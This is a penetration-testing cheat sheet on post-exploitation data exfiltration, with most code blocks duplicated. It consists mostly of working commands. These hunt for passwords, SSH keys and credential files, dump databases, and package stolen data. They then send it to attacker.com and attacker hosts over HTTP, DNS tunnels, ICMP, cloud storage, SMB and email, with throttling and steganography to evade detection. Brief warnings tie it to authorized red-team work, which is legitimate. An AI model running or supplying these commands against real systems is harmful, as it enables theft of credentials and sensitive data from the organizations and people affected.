Post-Exploitation
Data Exfiltration
Data exfiltration demonstrates the real-world impact of a breach by extracting sensitive information. This phase validates access and shows stakeholders what an attacker could steal.
T1041 | Exfil Over C2 T1048 | Exfil Over Alt Protocol T1567 | Exfil Over Web Service T1560 | Archive Collected Data
Warning
Only exfiltrate data with explicit authorization. Document what data you access and
handle all data according to the Rules of Engagement. Never exfiltrate real PII/PHI
unless specifically required.
flowchart LR
A[Data Discovery] --> B[Collection]
B --> C[Staging]
C --> D[Exfiltration]
D --> E[Evidence]
subgraph Methods
D --> D1[HTTP/S]
D --> D2[DNS]
D --> D3[ICMP]
D --> D4[Cloud]
end
style A fill:#00ff00,stroke:#000,color:#000
style E fill:#a855f7,stroke:#000,color:#000
Data Discovery
Windows File Search
powershell
# Search for sensitive files
dir /s /b C:\*password*.txt C:\*password*.xlsx C:\*credential* 2>nul
dir /s /b C:\*.kdbx C:\*.key C:\*.pem C:\*.pfx 2>nul
# PowerShell search
Get-ChildItem -Path C:\ -Recurse -Include *password*,*credential*,*secret* -ErrorAction SilentlyContinue
# Search file contents
findstr /s /i /m "password" C:\Users\*.txt
findstr /s /i /m "api_key\|secret\|token" C:\Users\*.config
# PowerShell content search
Get-ChildItem -Path C:\Users -Recurse -Include *.txt,*.xml,*.config | Select-String -Pattern "password","secret","key" | Select-Object Path,LineNumber,Line# Search for sensitive files
dir /s /b C:\*password*.txt C:\*password*.xlsx C:\*credential* 2>nul
dir /s /b C:\*.kdbx C:\*.key C:\*.pem C:\*.pfx 2>nul
# PowerShell search
Get-ChildItem -Path C:\ -Recurse -Include *password*,*credential*,*secret* -ErrorAction SilentlyContinue
# Search file contents
findstr /s /i /m "password" C:\Users\*.txt
findstr /s /i /m "api_key\|secret\|token" C:\Users\*.config
# PowerShell content search
Get-ChildItem -Path C:\Users -Recurse -Include *.txt,*.xml,*.config | Select-String -Pattern "password","secret","key" | Select-Object Path,LineNumber,LineLinux File Search
bash
# Find sensitive files
find / -name "*.conf" -o -name "*.config" -o -name "*password*" 2>/dev/null
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
find /home -name ".bash_history" -o -name ".mysql_history" 2>/dev/null
# Search file contents
grep -r "password" /etc/ 2>/dev/null
grep -r "password\|secret\|api_key" /var/www/ 2>/dev/null
# Find recent files
find / -type f -mtime -7 -name "*.xlsx" -o -name "*.docx" 2>/dev/null# Find sensitive files
find / -name "*.conf" -o -name "*.config" -o -name "*password*" 2>/dev/null
find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
find /home -name ".bash_history" -o -name ".mysql_history" 2>/dev/null
# Search file contents
grep -r "password" /etc/ 2>/dev/null
grep -r "password\|secret\|api_key" /var/www/ 2>/dev/null
# Find recent files
find / -type f -mtime -7 -name "*.xlsx" -o -name "*.docx" 2>/dev/nullNetwork Share Discovery
powershell
# Enumerate shares
net view \\server
net share
# PowerView
Find-DomainShare -CheckShareAccess
Find-InterestingDomainShareFile
# CrackMapExec
cme smb 10.10.10.0/24 -u user -p pass --shares
cme smb 10.10.10.0/24 -u user -p pass -M spider_plus
# Search for interesting files on shares
smbclient //server/share -U user%pass -c 'recurse;ls'# Enumerate shares
net view \\server
net share
# PowerView
Find-DomainShare -CheckShareAccess
Find-InterestingDomainShareFile
# CrackMapExec
cme smb 10.10.10.0/24 -u user -p pass --shares
cme smb 10.10.10.0/24 -u user -p pass -M spider_plus
# Search for interesting files on shares
smbclient //server/share -U user%pass -c 'recurse;ls'Database Discovery
powershell
# MySQL
mysql -u root -p -e "SHOW DATABASES;"
mysqldump -u root -p database_name > dump.sql
# MSSQL
sqlcmd -S localhost -U sa -P password -Q "SELECT name FROM sys.databases"
sqlcmd -S localhost -U sa -P password -Q "SELECT * FROM sensitive_table" -o output.csv
# PowerUpSQL
Get-SQLInstanceDomain | Get-SQLServerInfo
Get-SQLInstanceDomain | Get-SQLDatabase
# Extract from web configs
findstr /s /i "connectionstring" C:\inetpub\*.config# MySQL
mysql -u root -p -e "SHOW DATABASES;"
mysqldump -u root -p database_name > dump.sql
# MSSQL
sqlcmd -S localhost -U sa -P password -Q "SELECT name FROM sys.databases"
sqlcmd -S localhost -U sa -P password -Q "SELECT * FROM sensitive_table" -o output.csv
# PowerUpSQL
Get-SQLInstanceDomain | Get-SQLServerInfo
Get-SQLInstanceDomain | Get-SQLDatabase
# Extract from web configs
findstr /s /i "connectionstring" C:\inetpub\*.configData Collection & Staging
Archiving Data
powershell
# Windows - Compress for exfil
Compress-Archive -Path C:\Loot\* -DestinationPath C:\Temp\data.zip
# With password (7-Zip)
7z a -p"password" -mhe=on data.7z C:\Loot\*
# Linux
tar -czvf data.tar.gz /path/to/files
zip -r -e data.zip /path/to/files
# Split large files
split -b 50M data.tar.gz data_part_# Windows - Compress for exfil
Compress-Archive -Path C:\Loot\* -DestinationPath C:\Temp\data.zip
# With password (7-Zip)
7z a -p"password" -mhe=on data.7z C:\Loot\*
# Linux
tar -czvf data.tar.gz /path/to/files
zip -r -e data.zip /path/to/files
# Split large files
split -b 50M data.tar.gz data_part_Encoding/Encryption
bash
# Base64 encode
# Windows
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\data.zip")) > encoded.txt
certutil -encode data.zip encoded.txt
# Linux
base64 data.tar.gz > encoded.txt
cat data.tar.gz | gzip | base64
# Encrypt with OpenSSL
openssl enc -aes-256-cbc -salt -in data.tar.gz -out data.enc -k password
# GPG encryption
gpg -c --cipher-algo AES256 data.tar.gz# Base64 encode
# Windows
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\data.zip")) > encoded.txt
certutil -encode data.zip encoded.txt
# Linux
base64 data.tar.gz > encoded.txt
cat data.tar.gz | gzip | base64
# Encrypt with OpenSSL
openssl enc -aes-256-cbc -salt -in data.tar.gz -out data.enc -k password
# GPG encryption
gpg -c --cipher-algo AES256 data.tar.gzExfiltration Methods
HTTP/HTTPS
bash
# Simple HTTP POST
curl -X POST -F "file=@data.zip" https://attacker.com/upload
# PowerShell
$bytes = [IO.File]::ReadAllBytes("C:\data.zip")
Invoke-WebRequest -Uri "https://attacker.com/upload" -Method POST -Body $bytes
# Python HTTP server (receiver)
python3 -m http.server 8080 # For downloads
# For uploads use custom script or tools like updog
# wget POST
wget --post-file=data.zip https://attacker.com/upload# Simple HTTP POST
curl -X POST -F "file=@data.zip" https://attacker.com/upload
# PowerShell
$bytes = [IO.File]::ReadAllBytes("C:\data.zip")
Invoke-WebRequest -Uri "https://attacker.com/upload" -Method POST -Body $bytes
# Python HTTP server (receiver)
python3 -m http.server 8080 # For downloads
# For uploads use custom script or tools like updog
# wget POST
wget --post-file=data.zip https://attacker.com/uploadDNS Exfiltration
Information
DNS exfiltration is slow but often bypasses egress filtering.
Useful when HTTP/HTTPS is blocked.
bash
# DNScat2 Server
dnscat2-server attacker.com
# DNScat2 Client (on target)
./dnscat attacker.com
# Manual DNS exfil (encode data in subdomains)
# Max ~63 chars per label, ~253 total
# Base64 encode and chunk
for chunk in $(cat data.b64 | fold -w50); do
nslookup $chunk.exfil.attacker.com
done
# Iodine (DNS tunnel)
# Server
iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
# Client
iodine -f -P password tunnel.attacker.com# DNScat2 Server
dnscat2-server attacker.com
# DNScat2 Client (on target)
./dnscat attacker.com
# Manual DNS exfil (encode data in subdomains)
# Max ~63 chars per label, ~253 total
# Base64 encode and chunk
for chunk in $(cat data.b64 | fold -w50); do
nslookup $chunk.exfil.attacker.com
done
# Iodine (DNS tunnel)
# Server
iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
# Client
iodine -f -P password tunnel.attacker.comICMP Exfiltration
bash
# ptunnel (ICMP tunnel)
# Server
ptunnel-ng -s
# Client
ptunnel-ng -p proxy_ip -l 8000 -r attacker.com -R 22
# Manual ICMP exfil (PowerShell)
$ping = New-Object System.Net.NetworkInformation.Ping
$data = [System.Text.Encoding]::ASCII.GetBytes("secretdata")
$ping.Send("attacker_ip", 1000, $data)# ptunnel (ICMP tunnel)
# Server
ptunnel-ng -s
# Client
ptunnel-ng -p proxy_ip -l 8000 -r attacker.com -R 22
# Manual ICMP exfil (PowerShell)
$ping = New-Object System.Net.NetworkInformation.Ping
$data = [System.Text.Encoding]::ASCII.GetBytes("secretdata")
$ping.Send("attacker_ip", 1000, $data)Cloud Storage
bash
# AWS S3
aws s3 cp data.zip s3://exfil-bucket/
# Azure Blob
az storage blob upload --container-name exfil --file data.zip --name data.zip
# Rclone (supports many providers)
rclone copy data.zip remote:exfil/
# Google Drive (using gdrive)
gdrive upload data.zip# AWS S3
aws s3 cp data.zip s3://exfil-bucket/
# Azure Blob
az storage blob upload --container-name exfil --file data.zip --name data.zip
# Rclone (supports many providers)
rclone copy data.zip remote:exfil/
# Google Drive (using gdrive)
gdrive upload data.zipSMB/WebDAV
powershell
# Copy to SMB share
copy data.zip \\attacker\share\
xcopy /s C:\Loot \\attacker\share\Loot
# Mount WebDAV and copy
net use Z: https://attacker.com/webdav /user:user pass
copy data.zip Z:\
# Linux SMB
smbclient //attacker/share -U user -c 'put data.zip'# Copy to SMB share
copy data.zip \\attacker\share\
xcopy /s C:\Loot \\attacker\share\Loot
# Mount WebDAV and copy
net use Z: https://attacker.com/webdav /user:user pass
copy data.zip Z:\
# Linux SMB
smbclient //attacker/share -U user -c 'put data.zip' powershell
# PowerShell SMTP
$smtp = New-Object Net.Mail.SmtpClient("smtp.company.com")
$msg = New-Object Net.Mail.MailMessage
$msg.From = "user@company.com"
$msg.To.Add("attacker@external.com")
$msg.Subject = "Report"
$attachment = New-Object Net.Mail.Attachment("C:\data.zip")
$msg.Attachments.Add($attachment)
$smtp.Send($msg)
# swaks (command line)
swaks --to attacker@external.com --from user@company.com --server smtp.company.com --attach data.zip# PowerShell SMTP
$smtp = New-Object Net.Mail.SmtpClient("smtp.company.com")
$msg = New-Object Net.Mail.MailMessage
$msg.From = "user@company.com"
$msg.To.Add("attacker@external.com")
$msg.Subject = "Report"
$attachment = New-Object Net.Mail.Attachment("C:\data.zip")
$msg.Attachments.Add($attachment)
$smtp.Send($msg)
# swaks (command line)
swaks --to attacker@external.com --from user@company.com --server smtp.company.com --attach data.zipCovert Channels
Steganography
bash
# Hide data in images
steghide embed -cf image.jpg -ef secret.txt
# Extract
steghide extract -sf image.jpg
# OpenStego
openstego embed -mf secret.txt -cf cover.png -sf output.png# Hide data in images
steghide embed -cf image.jpg -ef secret.txt
# Extract
steghide extract -sf image.jpg
# OpenStego
openstego embed -mf secret.txt -cf cover.png -sf output.pngAlternate Data Streams (Windows)
powershell
# Hide file in ADS
type secret.txt > innocent.txt:hidden
# Read from ADS
more < innocent.txt:hidden
# List ADS
dir /r
Get-Item -Path innocent.txt -Stream *# Hide file in ADS
type secret.txt > innocent.txt:hidden
# Read from ADS
more < innocent.txt:hidden
# List ADS
dir /r
Get-Item -Path innocent.txt -Stream *Exfiltration Tools
PacketWhisper
bash
# DNS-based exfiltration using random DNS queries
# Evades signature detection by using real DNS lookups
# Transmit
python3 packetWhisper.py
# Select cipher, payload, and DNS server options# DNS-based exfiltration using random DNS queries
# Evades signature detection by using real DNS lookups
# Transmit
python3 packetWhisper.py
# Select cipher, payload, and DNS server optionsDET (Data Exfiltration Toolkit)
bash
# Supports multiple protocols: HTTP, DNS, ICMP, SMTP, Slack, etc.
# Server
python det.py -c config.json -L
# Client (send file)
python det.py -c config.json -f secret.zip# Supports multiple protocols: HTTP, DNS, ICMP, SMTP, Slack, etc.
# Server
python det.py -c config.json -L
# Client (send file)
python det.py -c config.json -f secret.zipCloakify
bash
# Transform data to look like lists (IPs, words, etc.)
python cloakify.py secret.zip ciphers/pokemonNames > pokemon.txt
# Decloakify
python decloakify.py pokemon.txt ciphers/pokemonNames# Transform data to look like lists (IPs, words, etc.)
python cloakify.py secret.zip ciphers/pokemonNames > pokemon.txt
# Decloakify
python decloakify.py pokemon.txt ciphers/pokemonNamesBandwidth Considerations
bash
# Throttle exfiltration to avoid detection
# Split and delay transfers
# Linux - rate limit
rsync --bwlimit=100 data.tar.gz attacker:/exfil/
# Windows PowerShell - chunked transfer
$chunkSize = 1MB
$file = [IO.File]::OpenRead("C:\data.zip")
$buffer = New-Object byte[] $chunkSize
while (($read = $file.Read($buffer, 0, $chunkSize)) -gt 0) {
# Send chunk
Start-Sleep -Seconds 30 # Delay between chunks
}
# curl rate limit
curl --limit-rate 100K -F "file=@data.zip" https://attacker.com/upload# Throttle exfiltration to avoid detection
# Split and delay transfers
# Linux - rate limit
rsync --bwlimit=100 data.tar.gz attacker:/exfil/
# Windows PowerShell - chunked transfer
$chunkSize = 1MB
$file = [IO.File]::OpenRead("C:\data.zip")
$buffer = New-Object byte[] $chunkSize
while (($read = $file.Read($buffer, 0, $chunkSize)) -gt 0) {
# Send chunk
Start-Sleep -Seconds 30 # Delay between chunks
}
# curl rate limit
curl --limit-rate 100K -F "file=@data.zip" https://attacker.com/uploadDocumentation Template
text
# Data Exfiltration Log
| Timestamp | Source System | Data Type | Size | Method | Destination |
|-----------|---------------|-----------|------|--------|-------------|
| 2024-01-15 10:30 | DC01 | NTDS.dit | 500MB | HTTPS | C2 Server |
| 2024-01-15 11:45 | FILESERV | Financials | 2GB | SMB | Attack Box |
| 2024-01-15 14:00 | SQLSRV | DB Dump | 100MB | DNS | Exfil Server |
# Important: Document but DO NOT keep actual sensitive data
# Screenshots and logs as proof, delete actual data# Data Exfiltration Log
| Timestamp | Source System | Data Type | Size | Method | Destination |
|-----------|---------------|-----------|------|--------|-------------|
| 2024-01-15 10:30 | DC01 | NTDS.dit | 500MB | HTTPS | C2 Server |
| 2024-01-15 11:45 | FILESERV | Financials | 2GB | SMB | Attack Box |
| 2024-01-15 14:00 | SQLSRV | DB Dump | 100MB | DNS | Exfil Server |
# Important: Document but DO NOT keep actual sensitive data
# Screenshots and logs as proof, delete actual dataDanger
Delete all exfiltrated data after documentation. Never retain client PII, PHI,
financial data, or other sensitive information beyond engagement requirements.